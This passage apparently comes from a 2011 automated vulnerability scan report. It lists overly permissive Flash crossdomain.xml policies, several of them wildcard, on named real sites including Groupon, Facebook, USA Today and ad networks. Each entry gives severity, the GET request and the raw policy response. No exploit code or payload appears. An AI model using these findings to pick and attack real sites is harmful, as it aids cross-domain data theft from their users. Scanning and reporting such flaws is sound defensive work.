HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:36:55 GMT Server: Apache/2.2.3 (Red Hat) Last-Modified: Mon, 02 May 2011 19:38:04 GMT ETag: "f406f8-199-4a250297d3f00 Accept-Ranges: bytes Content-Length: 409 Vary: Accept-Encoding Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*"/> <allow-access-from domain="*" secure="false"/> <allow-access-from domain="*" to-ports="80,443"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://usatoday1.112.2o7 |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: usatoday1.112.2o7.net |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:36:51 GMT Server: Omniture DC/2.0.0 xserver: www419 Connection: close Content-Type: text/html <cross-domain-policy> <allow-access-from domain="*" secure="false" /> <allow-http-request </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://va.px.invitemedia |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: va.px.invitemedia.com |
HTTP/1.0 200 OK Server: IM BidManager Date: Mon, 09 May 2011 15:37:12 GMT Content-Type: text/plain Content-Length: 81 <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://w10.localadbuy.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: w10.localadbuy.com |
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Mon, 09 May 2011 15:36:58 GMT Content-Type: application/xml Content-Length: 340 Last-Modified: Thu, 09 Dec 2010 18:13:51 GMT <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://widget.newsinc.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: widget.newsinc.com |
HTTP/1.1 200 OK x-amz-id-2: WG7y2gX1/96nanqwYADU x-amz-request-id: 9337D374BAA52553 Date: Mon, 09 May 2011 15:37:39 GMT Last-Modified: Mon, 26 Oct 2009 18:54:37 GMT ETag: "9a2df4412dfbe178fcc Accept-Ranges: bytes Content-Type: text/xml Content-Length: 335 Connection: keep-alive Server: AmazonS3 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://wvue.web.entriq |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: wvue.web.entriq.net |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:37:17 GMT Server: Apache X-Host: w3 Vary: Accept-Encoding Cache-Control: max-age=60 Expires: Mon, 09 May 2011 15:38:17 GMT Content-Length: 295 Keep-Alive: timeout=3 Connection: Keep-Alive Content-Type: text/html <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-http-request ...[SNIP]... <allow-access-from domain="*" secure="false" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.fox8live.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.fox8live.com |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:36:54 GMT Server: PWS/1.7.2.1 X-Px: ms iad-agg-n30 ( iad-agg-n23), rf-ht iad-agg-n23 ( origin) ETag: "0b66c58755c71:0" Cache-Control: max-age=120 Expires: Mon, 09 May 2011 15:38:54 GMT Age: 0 Content-Length: 121 Content-Type: text/xml Last-Modified: Tue, 20 Feb 2007 15:54:04 GMT Connection: close <?xml version="1.0" encoding="utf-8" ?> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.groupon.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.groupon.com |
HTTP/1.0 200 OK Server: nginx/0.7.65 Content-Type: text/xml Accept-Ranges: bytes Age: 258768 Date: Mon, 09 May 2011 15:35:34 GMT Last-Modified: Thu, 18 Nov 2010 03:41:54 GMT Content-Length: 352 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*" to-ports="80,443" secure="false" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.groupon.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.groupon.com |
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Mon, 09 May 2011 15:35:57 GMT Content-Type: text/xml Connection: close Accept-Ranges: bytes Age: 225292 Last-Modified: Thu, 18 Nov 2010 03:10:16 GMT Content-Length: 352 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*" to-ports="80,443" secure="false" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://xedge.aperture |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: xedge.aperture.displ |
HTTP/1.0 200 OK Cache-Control: max-age=86400 Content-Length: 268 Content-Type: text/xml Content-Location: http://xedge.aperture Last-Modified: Wed, 06 Jan 2010 19:44:14 GMT Accept-Ranges: bytes ETag: "88db83a088fca1:ddb" Server: Microsoft-IIS/6.0 X-Server: D2E.NJ-a.dm.com_x P3P: CP="NON DEVo PSAo PSDo CONo OUR BUS UNI" X-Powered-By: ASP.NET Date: Mon, 09 May 2011 15:37:52 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> <site-control perm ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://adadvisor.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: adadvisor.net |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:36:28 GMT Connection: close Server: AAWebServer P3P: policyref="http://www Content-Length: 418 Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*.tubemogul.com" /> ...[SNIP]... <allow-access-from domain="*.adap.tv" /> ...[SNIP]... <allow-access-from domain="*.videoegg.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://ads.bridgetrack |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ads.bridgetrack.com |
HTTP/1.1 200 OK Cache-Control: private Content-Length: 810 Content-Type: text/html Date: Mon, 09 May 2011 15:37:40 GMT Connection: close <?xml version="1.0"?> <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="ads.bridgetrack.com <allow-access-from domain="ads.bri ...[SNIP]... <allow-access-from domain="sec-ads.bridgetrack.com" /> <allow-access-from domain="cms-ads.bridgetrack.com" /> <allow-access-from domain="sec-cms-ads.bridgetrack <allow-access-from domain="travelerssaves.com" /> <allow-access-from domain="moneyneedsattention.com" /> <allow-access-from domain="www.moneyneedsattention <allow-access-from domain="portal.kaplan.edu" /> <allow-access-from domain="www.portal.kaplan.edu"/> <allow-access-from domain="*.spongecell.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.myvolvo.com.au" secure="false" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://content.usatoday |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: content.usatoday.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Wed, 16 Mar 2011 20:16:44 GMT Accept-Ranges: bytes ETag: "befaf11117e4cb1:0" Server: Microsoft-IIS/7.5 P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI" Date: Mon, 09 May 2011 15:38:09 GMT Connection: close Content-Length: 1558 <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.usatoday.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.usatoday.net" secure="true"/> ...[SNIP]... <allow-access-from domain="projects.usatoday.com"/> <allow-access-from domain="*.gannettonline.com"/> <allow-access-from domain="www.smashingideas.com" secure="true"/> ...[SNIP]... <allow-access-from domain="beta.tagware.com" secure="true"/> ...[SNIP]... <allow-access-from domain="nmp.newsgator.com" secure="true"/> ...[SNIP]... <allow-access-from domain="maventechnologies.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.maventechnologies.com" secure="true"/> ...[SNIP]... <allow-access-from domain="mavenapps.net" secure="true"/> ...[SNIP]... <allow-access-from domain="*.mavenapps.net" secure="true"/> ...[SNIP]... <allow-access-from domain="hostlogic.ca" secure="true"/> ...[SNIP]... <allow-access-from domain="pages.samsung.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.pointroll.com" /> <allow-access-from domain="*.facebook.com" /> <allow-access-from domain="demo.pointroll.net" /> <allow-access-from domain="*.brightcove.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.metagrapher.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://contextweb |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: contextweb.usatoday.net |
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Wed, 16 Mar 2011 20:16:45 GMT ETag: "8034251217e4cb1:0" Server: Microsoft-IIS/7.5 P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI" Date: Mon, 09 May 2011 15:36:35 GMT Content-Length: 1558 Connection: close <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.usatoday.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.usatoday.net" secure="true"/> ...[SNIP]... <allow-access-from domain="*.gannettonline.com"/> <allow-access-from domain="www.smashingideas.com" secure="true"/> ...[SNIP]... <allow-access-from domain="beta.tagware.com" secure="true"/> ...[SNIP]... <allow-access-from domain="nmp.newsgator.com" secure="true"/> ...[SNIP]... <allow-access-from domain="maventechnologies.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.maventechnologies.com" secure="true"/> ...[SNIP]... <allow-access-from domain="mavenapps.net" secure="true"/> ...[SNIP]... <allow-access-from domain="*.mavenapps.net" secure="true"/> ...[SNIP]... <allow-access-from domain="hostlogic.ca" secure="true"/> ...[SNIP]... <allow-access-from domain="pages.samsung.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.pointroll.com" /> <allow-access-from domain="*.facebook.com" /> <allow-access-from domain="demo.pointroll.net" /> <allow-access-from domain="*.brightcove.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.metagrapher.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://data.usatoday.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: data.usatoday.net |
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Wed, 16 Mar 2011 20:16:48 GMT Accept-Ranges: bytes ETag: "069301417e4cb1:0" Server: Microsoft-IIS/7.5 P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI" Content-Length: 1558 Date: Mon, 09 May 2011 15:37:58 GMT Connection: close <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.usatoday.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.usatoday.net" secure="true"/> ...[SNIP]... <allow-access-from domain="*.gannettonline.com"/> <allow-access-from domain="www.smashingideas.com" secure="true"/> ...[SNIP]... <allow-access-from domain="beta.tagware.com" secure="true"/> ...[SNIP]... <allow-access-from domain="nmp.newsgator.com" secure="true"/> ...[SNIP]... <allow-access-from domain="maventechnologies.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.maventechnologies.com" secure="true"/> ...[SNIP]... <allow-access-from domain="mavenapps.net" secure="true"/> ...[SNIP]... <allow-access-from domain="*.mavenapps.net" secure="true"/> ...[SNIP]... <allow-access-from domain="hostlogic.ca" secure="true"/> ...[SNIP]... <allow-access-from domain="pages.samsung.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.pointroll.com" /> <allow-access-from domain="*.facebook.com" /> <allow-access-from domain="demo.pointroll.net" /> <allow-access-from domain="*.brightcove.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.metagrapher.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://googleads.g |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: googleads.g.doubleclick |
HTTP/1.0 200 OK P3P: policyref="http:/ Content-Type: text/x-cross-domain Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT Date: Mon, 09 May 2011 01:55:59 GMT Expires: Tue, 10 May 2011 01:55:59 GMT X-Content-Type-Options: nosniff Server: cafe X-XSS-Protection: 1; mode=block Age: 49166 Cache-Control: public, max-age=86400 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="maps.gstatic.com" /> <allow-access-from domain="maps.gstatic.cn" /> <allow-access-from domain="*.googlesyndication.com" /> <allow-access-from domain="*.google.com" /> <allow-access-from domain="*.google.ae" /> <allow-access-from domain="*.google.at" /> <allow-access-from domain="*.google.be" /> <allow-access-from domain="*.google.ca" /> <allow-access-from domain="*.google.ch" /> <allow-access-from domain="*.google.cn" /> <allow-access-from domain="*.google.co.il" /> <allow-access-from domain="*.google.co.in" /> <allow-access-from domain="*.google.co.jp" /> <allow-access-from domain="*.google.co.kr" /> <allow-access-from domain="*.google.co.nz" /> <allow-access-from domain="*.google.co.sk" /> <allow-access-from domain="*.google.co.uk" /> <allow-access-from domain="*.google.co.ve" /> <allow-access-from domain="*.google.co.za" /> <allow-access-from domain="*.google.com.ar" /> <allow-access-from domain="*.google.com.au" /> <allow-access-from domain="*.google.com.br" /> <allow-access-from domain="*.google.com.gr" /> <allow-access-from domain="*.google.com.hk" /> <allow-access-from domain="*.google.com.ly" /> <allow-access-from domain="*.google.com.mx" /> <allow-access-from domain="*.google.com.my" /> <allow-access-from domain="*.google.com.pe" /> <allow-access-from domain="*.google.com.ph" /> <allow-access-from domain="*.google.com.pk" /> <allow-access-from domain="*.google.com.ru" /> <allow-access-from domain="*.google.com.sg" /> <allow-access-from domain="*.google.com.tr" /> <allow-access-from domain="*.google.com.tw" /> <allow-access-from domain="*.google.com.ua" /> <allow-access-from domain="*.google.com.vn" /> <allow-access-from domain="*.google.de" /> <allow-access-from domain="*.google.dk" /> <allow-access-from domain="*.google.es" /> <allow-access-from domain="*.google.fi" /> <allow-access-from domain="*.google.fr" /> <allow-access-from domain="*.google.it" /> <allow-access-from domain="*.google.lt" /> <allow-access-from domain="*.google.lv" /> <allow-access-from domain="*.google.nl" /> <allow-access-from domain="*.google.no" /> <allow-access-from domain="*.google.pl" /> <allow-access-from domain="*.google.pt" /> <allow-access-from domain="*.google.ro" /> <allow-access-from domain="*.google.se" /> <allow-access-from domain="*.youtube.com" /> <allow-access-from domain="*.ytimg.com" /> <allow-access-from domain="*.2mdn.net" /> <allow-access-from domain="*.doubleclick.net" /> <allow-access-from domain="*.doubleclick.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://i.usatoday.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: i.usatoday.net |
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Wed, 16 Mar 2011 20:16:48 GMT Accept-Ranges: bytes ETag: "069301417e4cb1:0" Server: Microsoft-IIS/7.5 P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI" Content-Length: 1558 Date: Mon, 09 May 2011 15:36:39 GMT Connection: close <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.usatoday.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.usatoday.net" secure="true"/> ...[SNIP]... <allow-access-from domain="*.gannettonline.com"/> <allow-access-from domain="www.smashingideas.com" secure="true"/> ...[SNIP]... <allow-access-from domain="beta.tagware.com" secure="true"/> ...[SNIP]... <allow-access-from domain="nmp.newsgator.com" secure="true"/> ...[SNIP]... <allow-access-from domain="maventechnologies.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.maventechnologies.com" secure="true"/> ...[SNIP]... <allow-access-from domain="mavenapps.net" secure="true"/> ...[SNIP]... <allow-access-from domain="*.mavenapps.net" secure="true"/> ...[SNIP]... <allow-access-from domain="hostlogic.ca" secure="true"/> ...[SNIP]... <allow-access-from domain="pages.samsung.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.pointroll.com" /> <allow-access-from domain="*.facebook.com" /> <allow-access-from domain="demo.pointroll.net" /> <allow-access-from domain="*.brightcove.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.metagrapher.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://optimized-by |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: optimized-by.rubicon |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:36:58 GMT Server: RAS/1.3 (Unix) Last-Modified: Tue, 12 Apr 2011 23:18:01 GMT Accept-Ranges: bytes Content-Length: 223 _eep-Alive: timeout=5, max=5 _onnection: Keep-Alive Content-Type: application/xml Via: CN-5000 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.rubiconproject.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://pagead2.googl |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: pagead2.googlesyndication |
HTTP/1.0 200 OK P3P: policyref="http://www Content-Type: text/x-cross-domain Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT Date: Mon, 09 May 2011 05:11:30 GMT Expires: Tue, 10 May 2011 05:11:30 GMT X-Content-Type-Options: nosniff Server: cafe X-XSS-Protection: 1; mode=block Age: 37413 Cache-Control: public, max-age=86400 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="maps.gstatic.com" /> <allow-access-from domain="maps.gstatic.cn" /> <allow-access-from domain="*.googlesyndication.com" /> <allow-access-from domain="*.google.com" /> <allow-access-from domain="*.google.ae" /> <allow-access-from domain="*.google.at" /> <allow-access-from domain="*.google.be" /> <allow-access-from domain="*.google.ca" /> <allow-access-from domain="*.google.ch" /> <allow-access-from domain="*.google.cn" /> <allow-access-from domain="*.google.co.il" /> <allow-access-from domain="*.google.co.in" /> <allow-access-from domain="*.google.co.jp" /> <allow-access-from domain="*.google.co.kr" /> <allow-access-from domain="*.google.co.nz" /> <allow-access-from domain="*.google.co.sk" /> <allow-access-from domain="*.google.co.uk" /> <allow-access-from domain="*.google.co.ve" /> <allow-access-from domain="*.google.co.za" /> <allow-access-from domain="*.google.com.ar" /> <allow-access-from domain="*.google.com.au" /> <allow-access-from domain="*.google.com.br" /> <allow-access-from domain="*.google.com.gr" /> <allow-access-from domain="*.google.com.hk" /> <allow-access-from domain="*.google.com.ly" /> <allow-access-from domain="*.google.com.mx" /> <allow-access-from domain="*.google.com.my" /> <allow-access-from domain="*.google.com.pe" /> <allow-access-from domain="*.google.com.ph" /> <allow-access-from domain="*.google.com.pk" /> <allow-access-from domain="*.google.com.ru" /> <allow-access-from domain="*.google.com.sg" /> <allow-access-from domain="*.google.com.tr" /> <allow-access-from domain="*.google.com.tw" /> <allow-access-from domain="*.google.com.ua" /> <allow-access-from domain="*.google.com.vn" /> <allow-access-from domain="*.google.de" /> <allow-access-from domain="*.google.dk" /> <allow-access-from domain="*.google.es" /> <allow-access-from domain="*.google.fi" /> <allow-access-from domain="*.google.fr" /> <allow-access-from domain="*.google.it" /> <allow-access-from domain="*.google.lt" /> <allow-access-from domain="*.google.lv" /> <allow-access-from domain="*.google.nl" /> <allow-access-from domain="*.google.no" /> <allow-access-from domain="*.google.pl" /> <allow-access-from domain="*.google.pt" /> <allow-access-from domain="*.google.ro" /> <allow-access-from domain="*.google.se" /> <allow-access-from domain="*.youtube.com" /> <allow-access-from domain="*.ytimg.com" /> <allow-access-from domain="*.2mdn.net" /> <allow-access-from domain="*.doubleclick.net" /> <allow-access-from domain="*.doubleclick.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://pubads.g |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: pubads.g.doubleclick.net |
HTTP/1.0 200 OK P3P: policyref="http:/ Content-Type: text/x-cross-domain Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT Date: Mon, 09 May 2011 04:11:58 GMT Expires: Tue, 10 May 2011 04:11:58 GMT X-Content-Type-Options: nosniff Server: cafe X-XSS-Protection: 1; mode=block Age: 40983 Cache-Control: public, max-age=86400 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="maps.gstatic.com" /> <allow-access-from domain="maps.gstatic.cn" /> <allow-access-from domain="*.googlesyndication.com" /> <allow-access-from domain="*.google.com" /> <allow-access-from domain="*.google.ae" /> <allow-access-from domain="*.google.at" /> <allow-access-from domain="*.google.be" /> <allow-access-from domain="*.google.ca" /> <allow-access-from domain="*.google.ch" /> <allow-access-from domain="*.google.cn" /> <allow-access-from domain="*.google.co.il" /> <allow-access-from domain="*.google.co.in" /> <allow-access-from domain="*.google.co.jp" /> <allow-access-from domain="*.google.co.kr" /> <allow-access-from domain="*.google.co.nz" /> <allow-access-from domain="*.google.co.sk" /> <allow-access-from domain="*.google.co.uk" /> <allow-access-from domain="*.google.co.ve" /> <allow-access-from domain="*.google.co.za" /> <allow-access-from domain="*.google.com.ar" /> <allow-access-from domain="*.google.com.au" /> <allow-access-from domain="*.google.com.br" /> <allow-access-from domain="*.google.com.gr" /> <allow-access-from domain="*.google.com.hk" /> <allow-access-from domain="*.google.com.ly" /> <allow-access-from domain="*.google.com.mx" /> <allow-access-from domain="*.google.com.my" /> <allow-access-from domain="*.google.com.pe" /> <allow-access-from domain="*.google.com.ph" /> <allow-access-from domain="*.google.com.pk" /> <allow-access-from domain="*.google.com.ru" /> <allow-access-from domain="*.google.com.sg" /> <allow-access-from domain="*.google.com.tr" /> <allow-access-from domain="*.google.com.tw" /> <allow-access-from domain="*.google.com.ua" /> <allow-access-from domain="*.google.com.vn" /> <allow-access-from domain="*.google.de" /> <allow-access-from domain="*.google.dk" /> <allow-access-from domain="*.google.es" /> <allow-access-from domain="*.google.fi" /> <allow-access-from domain="*.google.fr" /> <allow-access-from domain="*.google.it" /> <allow-access-from domain="*.google.lt" /> <allow-access-from domain="*.google.lv" /> <allow-access-from domain="*.google.nl" /> <allow-access-from domain="*.google.no" /> <allow-access-from domain="*.google.pl" /> <allow-access-from domain="*.google.pt" /> <allow-access-from domain="*.google.ro" /> <allow-access-from domain="*.google.se" /> <allow-access-from domain="*.youtube.com" /> <allow-access-from domain="*.ytimg.com" /> <allow-access-from domain="*.2mdn.net" /> <allow-access-from domain="*.doubleclick.net" /> <allow-access-from domain="*.doubleclick.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://rd.meebo.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: rd.meebo.com |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 09 May 2011 15:35:01 GMT Content-Type: text/xml; charset=utf8 Content-Length: 91 Last-Modified: Wed, 26 Jan 2011 19:56:05 GMT Connection: close Accept-Ranges: bytes <cross-domain-policy> <allow-access-from domain="*.meebo.com"/> </cross-domain-policy> |
Severity: | Low |
Confidence: | Certain |
Host: | http://share.meebo.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: share.meebo.com |
HTTP/1.0 200 OK Last-Modified: Wed, 05 May 2010 22:56:50 GMT ETag: "2211755815" Content-Type: text/xml Server: lighttpd/1.4.19 Cache-Control: max-age=604800 Expires: Mon, 16 May 2011 15:35:31 GMT Date: Mon, 09 May 2011 15:35:31 GMT Content-Length: 155 Connection: close <cross-domain-policy> <allow-access-from domain="*.meebo.com"/> <allow-http-request </cross-domain-policy> |
Severity: | Low |
Confidence: | Certain |
Host: | http://static.ak.fbcdn |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: static.ak.fbcdn.net |
HTTP/1.0 200 OK Content-Type: text/x-cross-domain X-FB-Server: 10.138.64.186 Date: Mon, 09 May 2011 15:35:53 GMT Content-Length: 1473 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="s-static.facebook.com" /> <allow-access-from domain="static.facebook.com" /> <allow-access-from domain="static.api.ak.facebook <allow-access-from domain="*.static.ak.facebook.com" /> <allow-access-from domain="s-static.thefacebook.com" /> <allow-access-from domain="static.thefacebook.com" /> <allow-access-from domain="static.api.ak.thefacebook <allow-access-from domain="*.static.ak.thefacebook <allow-access-from domain="*.static.ak.fbcdn.com" /> <allow-access-from domain="s-static.ak.fbcdn.net" /> <allow-access-from domain="*.static.ak.fbcdn.net" /> <allow-access-from domain="s-static.ak.facebook.com" /> <allow-access-from domain="www.facebook.com" /> <allow-access-from domain="www.new.facebook.com" /> <allow-access-from domain="register.facebook.com" /> <allow-access-from domain="login.facebook.com" /> <allow-access-from domain="ssl.facebook.com" /> <allow-access-from domain="secure.facebook.com" /> <allow-access-from domain="ssl.new.facebook.com" /> ...[SNIP]... <allow-access-from domain="fvr.facebook.com" /> <allow-access-from domain="www.latest.facebook.com" /> <allow-access-from domain="www.inyour.facebook.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://syndication.mmismm |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: syndication.mmismm.com |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:35:02 GMT Server: Apache Last-Modified: Fri, 22 Apr 2011 21:27:32 GMT ETag: "10e-4a188868f3900" Accept-Ranges: bytes Content-Length: 270 Keep-Alive: timeout=300 Connection: Keep-Alive Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*.adap.tv"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://videos.usatoday |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: videos.usatoday.net |
HTTP/1.0 200 OK Server: Apache ETag: "f3c5e455d9c4b849b77 Last-Modified: Mon, 01 Mar 2010 18:55:02 GMT Accept-Ranges: bytes Content-Length: 465 Content-Type: application/xml Date: Mon, 09 May 2011 15:38:54 GMT Connection: close <?xml version="1.0"?> <cross-domain-policy> <!-- Note: secure=false is confusing, but basically its saying to allow SSL connections. Their reasoning is something abo ...[SNIP]... <allow-access-from domain="*.brightcove.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.brightcove.tv" secure="false" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.collegesurfing |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.collegesurfing.com |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:35:10 GMT Server: Apache/2.2.3 (CentOS) Last-Modified: Wed, 29 Aug 2007 11:26:03 GMT ETag: "219006d-c7-438d4dadd48c0 Accept-Ranges: bytes Content-Length: 199 Connection: close Content-Type: text/xml Set-Cookie: BIGipServerwww.colle <?xml version="1.0" ?> <cross-domain-policy> <allow-access-from domain="*.virtualcollegeadvisor <allow-access-from domain="*.virtualcollegeadvisor </cross-domain-policy> |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.facebook.com |
HTTP/1.0 200 OK Content-Type: text/x-cross-domain X-FB-Server: 10.54.111.43 Connection: close Content-Length: 1473 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="s-static.facebook.com" /> <allow-access-from domain="static.facebook.com" /> <allow-access-from domain="static.api.ak.facebook <allow-access-from domain="*.static.ak.facebook.com" /> <allow-access-from domain="s-static.thefacebook.com" /> <allow-access-from domain="static.thefacebook.com" /> <allow-access-from domain="static.api.ak.thefacebook <allow-access-from domain="*.static.ak.thefacebook <allow-access-from domain="*.static.ak.fbcdn.com" /> <allow-access-from domain="s-static.ak.fbcdn.net" /> <allow-access-from domain="*.static.ak.fbcdn.net" /> <allow-access-from domain="s-static.ak.facebook.com" /> ...[SNIP]... <allow-access-from domain="www.new.facebook.com" 